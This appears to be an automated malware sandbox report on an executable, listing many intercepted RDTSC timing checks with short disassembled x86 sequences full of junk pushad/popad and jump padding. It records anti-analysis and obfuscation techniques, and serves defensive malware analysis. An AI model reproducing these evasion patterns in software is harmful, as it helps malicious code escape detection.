                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: EE3112 second address: EE3129 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F9F112ED798h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f jo 00007F9F112ED796h 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: EE3129 second address: EE3144 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push edi 0x00000007 pop edi 0x00000008 popad 0x00000009 jmp 00007F9F10525C02h 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: EF0A02 second address: EF0A06 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: EF0A06 second address: EF0A10 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: EF0A10 second address: EF0A14 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: DFE71C second address: DFE721 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: EF2F7D second address: EF2F81 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: EF2F81 second address: EF2F89 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: EF2F89 second address: EF2FB2 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jmp 00007F9F112ED7A8h 0x00000008 pop ebx 0x00000009 pushad 0x0000000a jnp 00007F9F112ED796h 0x00000010 push edx 0x00000011 pop edx 0x00000012 push edx 0x00000013 pop edx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: E01C3D second address: E01C5D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007F9F10525BF6h 0x0000000a pushad 0x0000000b popad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 jmp 00007F9F10525BFFh 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: F02713 second address: F02717 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: F16502 second address: F16540 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F9F10525BFAh 0x00000008 push eax 0x00000009 pop eax 0x0000000a pushad 0x0000000b popad 0x0000000c pushad 0x0000000d jmp 00007F9F10525BFAh 0x00000012 push ecx 0x00000013 pop ecx 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 push eax 0x00000018 push edx 0x00000019 push eax 0x0000001a push edx 0x0000001b jmp 00007F9F10525C08h 0x00000020 jne 00007F9F10525BF6h 0x00000026 rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: F16540 second address: F16556 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jc 00007F9F112ED796h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jbe 00007F9F112ED796h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: F16556 second address: F1655A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: F1655A second address: F16560 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: F166B5 second address: F166BB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: F166BB second address: F166E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 jc 00007F9F112ED7B5h 0x0000000b jmp 00007F9F112ED79Dh 0x00000010 jmp 00007F9F112ED7A2h 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: F166E5 second address: F166FE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9F10525BFFh 0x00000007 jp 00007F9F10525BFCh 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: F168A9 second address: F168AE instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: F16CF1 second address: F16D32 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push edi 0x00000006 jmp 00007F9F10525C03h 0x0000000b jmp 00007F9F10525C04h 0x00000010 pop edi 0x00000011 jmp 00007F9F10525BFEh 0x00000016 pushad 0x00000017 push edi 0x00000018 pop edi 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: F16E99 second address: F16EC5 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F9F112ED798h 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F9F112ED7A1h 0x00000011 jmp 00007F9F112ED79Fh 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: F17178 second address: F17182 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 pushad 0x00000007 popad 0x00000008 push edi 0x00000009 pop edi 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: F17182 second address: F1718C instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F9F112ED796h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: F1A23D second address: F1A241 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: F1A4B5 second address: F1A518 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007F9F112ED7A2h 0x0000000c jmp 00007F9F112ED79Dh 0x00000011 popad 0x00000012 popad 0x00000013 nop 0x00000014 push 00000000h 0x00000016 push eax 0x00000017 call 00007F9F112ED798h 0x0000001c pop eax 0x0000001d mov dword ptr [esp+04h], eax 0x00000021 add dword ptr [esp+04h], 00000014h 0x00000029 inc eax 0x0000002a push eax 0x0000002b ret 0x0000002c pop eax 0x0000002d ret 0x0000002e push dword ptr [ebp+122D1865h] 0x00000034 adc dx, 23AFh 0x00000039 push 42E5EE22h 0x0000003e push eax 0x0000003f push edx 0x00000040 jng 00007F9F112ED79Ch 0x00000046 rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: F1D3B9 second address: F1D3C2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: F1D3C2 second address: F1D3D6 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F9F112ED79Bh 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: 557036E second address: 5570374 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: 5570374 second address: 5570378 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: 5570378 second address: 557037C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: 557037C second address: 55703EB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007F9F112ED79Eh 0x0000000e xchg eax, ebp 0x0000000f pushad 0x00000010 pushad 0x00000011 movzx esi, di 0x00000014 pushad 0x00000015 popad 0x00000016 popad 0x00000017 mov ebx, 55BD980Ah 0x0000001c popad 0x0000001d mov ebp, esp 0x0000001f pushad 0x00000020 jmp 00007F9F112ED7A7h 0x00000025 mov ah, FFh 0x00000027 popad 0x00000028 mov edx, dword ptr [ebp+0Ch] 0x0000002b pushad 0x0000002c mov ax, 6FD3h 0x00000030 popad 0x00000031 mov ecx, dword ptr [ebp+08h] 0x00000034 push eax 0x00000035 push edx 0x00000036 pushad 0x00000037 mov dx, AEE6h 0x0000003b call 00007F9F112ED7A7h 0x00000040 pop eax 0x00000041 popad 0x00000042 rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: 55703EB second address: 55703F1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: 55703F1 second address: 55703F5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: 55907E3 second address: 55907E9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: 55907E9 second address: 55907ED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: 55907ED second address: 559082C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], ebp 0x0000000b jmp 00007F9F10525BFFh 0x00000010 mov ebp, esp 0x00000012 jmp 00007F9F10525C06h 0x00000017 xchg eax, ecx 0x00000018 pushad 0x00000019 mov ecx, 229E67ADh 0x0000001e push eax 0x0000001f push edx 0x00000020 mov cx, BECFh 0x00000024 rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: 559082C second address: 559083D instructions: 0x00000000 rdtsc 0x00000002 mov ecx, 2B9D78EBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: 559083D second address: 5590841 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: 5590841 second address: 5590847 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: 5590847 second address: 5590870 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9F10525C05h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ecx 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F9F10525BFDh 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: 5590870 second address: 55908E9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9F112ED7A1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, esi 0x0000000a jmp 00007F9F112ED79Eh 0x0000000f push eax 0x00000010 jmp 00007F9F112ED79Bh 0x00000015 xchg eax, esi 0x00000016 jmp 00007F9F112ED7A6h 0x0000001b lea eax, dword ptr [ebp-04h] 0x0000001e push eax 0x0000001f push edx 0x00000020 pushad 0x00000021 pushfd 0x00000022 jmp 00007F9F112ED79Dh 0x00000027 sub esi, 232B3F86h 0x0000002d jmp 00007F9F112ED7A1h 0x00000032 popfd 0x00000033 mov eax, 61309937h 0x00000038 popad 0x00000039 rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: 55908E9 second address: 5590910 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9F10525BFDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a jmp 00007F9F10525BFEh 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: 5590910 second address: 5590914 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: 5590914 second address: 5590930 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9F10525C08h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: 5590930 second address: 5590936 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: 5590936 second address: 559093A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: 559093A second address: 559094D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c movzx esi, di 0x0000000f movsx edx, ax 0x00000012 popad 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: 559094D second address: 5590953 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: 5590992 second address: 55909C1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9F112ED7A1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 cmp dword ptr [ebp-04h], 00000000h 0x0000000d jmp 00007F9F112ED79Eh 0x00000012 mov esi, eax 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: 55909C1 second address: 55909C5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: 55909C5 second address: 55909C9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: 55909C9 second address: 55909CF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: 5590A76 second address: 558008F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ecx, ebx 0x00000005 mov bh, 99h 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop esi 0x0000000b jmp 00007F9F112ED7A0h 0x00000010 leave 0x00000011 jmp 00007F9F112ED7A0h 0x00000016 retn 0004h 0x00000019 nop 0x0000001a sub esp, 04h 0x0000001d xor ebx, ebx 0x0000001f cmp eax, 00000000h 0x00000022 je 00007F9F112ED8FAh 0x00000028 mov dword ptr [esp], 0000000Dh 0x0000002f call 00007F9F15C09931h 0x00000034 mov edi, edi 0x00000036 pushad 0x00000037 mov eax, 1E464CBDh 0x0000003c pushfd 0x0000003d jmp 00007F9F112ED79Ah 0x00000042 adc ax, 3498h 0x00000047 jmp 00007F9F112ED79Bh 0x0000004c popfd 0x0000004d popad 0x0000004e xchg eax, ebp 0x0000004f jmp 00007F9F112ED7A6h 0x00000054 push eax 0x00000055 jmp 00007F9F112ED79Bh 0x0000005a xchg eax, ebp 0x0000005b pushad 0x0000005c mov esi, 250C7C4Bh 0x00000061 mov bx, cx 0x00000064 popad 0x00000065 mov ebp, esp 0x00000067 push eax 0x00000068 push edx 0x00000069 pushad 0x0000006a call 00007F9F112ED79Fh 0x0000006f pop eax 0x00000070 pushfd 0x00000071 jmp 00007F9F112ED7A9h 0x00000076 jmp 00007F9F112ED79Bh 0x0000007b popfd 0x0000007c popad 0x0000007d rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: 558008F second address: 55800EF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F9F10525BFFh 0x00000009 sbb eax, 2C8F7D7Eh 0x0000000f jmp 00007F9F10525C09h 0x00000014 popfd 0x00000015 pushfd 0x00000016 jmp 00007F9F10525C00h 0x0000001b sbb ax, 6878h 0x00000020 jmp 00007F9F10525BFBh 0x00000025 popfd 0x00000026 popad 0x00000027 pop edx 0x00000028 pop eax 0x00000029 sub esp, 2Ch 0x0000002c pushad 0x0000002d push eax 0x0000002e push edx 0x0000002f mov ch, 9Ah 0x00000031 rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: 55800EF second address: 5580143 instructions: 0x00000000 rdtsc 0x00000002 mov di, BEF2h 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushfd 0x00000009 jmp 00007F9F112ED7A3h 0x0000000e sbb ah, FFFFFFEEh 0x00000011 jmp 00007F9F112ED7A9h 0x00000016 popfd 0x00000017 popad 0x00000018 xchg eax, ebx 0x00000019 push eax 0x0000001a push edx 0x0000001b pushad 0x0000001c jmp 00007F9F112ED7A3h 0x00000021 pushad 0x00000022 popad 0x00000023 popad 0x00000024 rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: 5580143 second address: 558016D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9F10525BFFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F9F10525C04h 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: 558016D second address: 5580187 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F9F112ED79Dh 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: 5580187 second address: 558018D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: 558018D second address: 55801F4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ax, 4217h 0x00000007 pushfd 0x00000008 jmp 00007F9F112ED79Ch 0x0000000d adc esi, 4E69FB88h 0x00000013 jmp 00007F9F112ED79Bh 0x00000018 popfd 0x00000019 popad 0x0000001a pop edx 0x0000001b pop eax 0x0000001c xchg eax, edi 0x0000001d push eax 0x0000001e push edx 0x0000001f pushad 0x00000020 pushfd 0x00000021 jmp 00007F9F112ED79Bh 0x00000026 or ch, FFFFFFCEh 0x00000029 jmp 00007F9F112ED7A9h 0x0000002e popfd 0x0000002f jmp 00007F9F112ED7A0h 0x00000034 popad 0x00000035 rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: 55801F4 second address: 55801FA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: 5580287 second address: 55802B8 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007F9F112ED7A1h 0x00000008 sub si, 5036h 0x0000000d jmp 00007F9F112ED7A1h 0x00000012 popfd 0x00000013 pop edx 0x00000014 pop eax 0x00000015 push eax 0x00000016 push edx 0x00000017 mov ebx, ecx 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: 55802B8 second address: 5580312 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007F9F10525BFAh 0x00000008 or ax, 5F58h 0x0000000d jmp 00007F9F10525BFBh 0x00000012 popfd 0x00000013 pop edx 0x00000014 pop eax 0x00000015 popad 0x00000016 inc ebx 0x00000017 jmp 00007F9F10525C06h 0x0000001c test al, al 0x0000001e pushad 0x0000001f call 00007F9F10525BFEh 0x00000024 movzx eax, bx 0x00000027 pop edx 0x00000028 push eax 0x00000029 push edx 0x0000002a call 00007F9F10525BFAh 0x0000002f pop esi 0x00000030 rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: 5580508 second address: 558050D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: 558050D second address: 558051C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F9F10525BFBh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: 558051C second address: 5580542 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebx, dword ptr [ebp+08h] 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F9F112ED7A7h 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: 5580542 second address: 558055F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9F10525C09h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: 558055F second address: 558056F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F9F112ED79Ch 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: 558056F second address: 5580573 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: 5580573 second address: 558058B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 lea eax, dword ptr [ebp-2Ch] 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e mov esi, 108D3EDFh 0x00000013 mov si, E9FBh 0x00000017 popad 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: 558058B second address: 55805E9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov edi, 067555E2h 0x00000008 jmp 00007F9F10525C03h 0x0000000d popad 0x0000000e pop edx 0x0000000f pop eax 0x00000010 xchg eax, esi 0x00000011 pushad 0x00000012 pushfd 0x00000013 jmp 00007F9F10525C04h 0x00000018 or cx, 2BA8h 0x0000001d jmp 00007F9F10525BFBh 0x00000022 popfd 0x00000023 push eax 0x00000024 push edx 0x00000025 jmp 00007F9F10525C06h 0x0000002a rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: 55805E9 second address: 558062A instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007F9F112ED7A2h 0x00000008 sbb eax, 47E59938h 0x0000000e jmp 00007F9F112ED79Bh 0x00000013 popfd 0x00000014 pop edx 0x00000015 pop eax 0x00000016 popad 0x00000017 push eax 0x00000018 push eax 0x00000019 push edx 0x0000001a jmp 00007F9F112ED7A4h 0x0000001f rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: 558062A second address: 5580630 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: 5580630 second address: 558063F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, esi 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: 558063F second address: 5580645 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: 5580645 second address: 5580696 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007F9F112ED7A3h 0x00000008 pop eax 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c nop 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 call 00007F9F112ED7A7h 0x00000015 pop esi 0x00000016 call 00007F9F112ED7A9h 0x0000001b pop ecx 0x0000001c popad 0x0000001d rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: 5580696 second address: 55806CD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9F10525BFEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007F9F10525BFCh 0x00000013 sbb esi, 6656DD18h 0x00000019 jmp 00007F9F10525BFBh 0x0000001e popfd 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
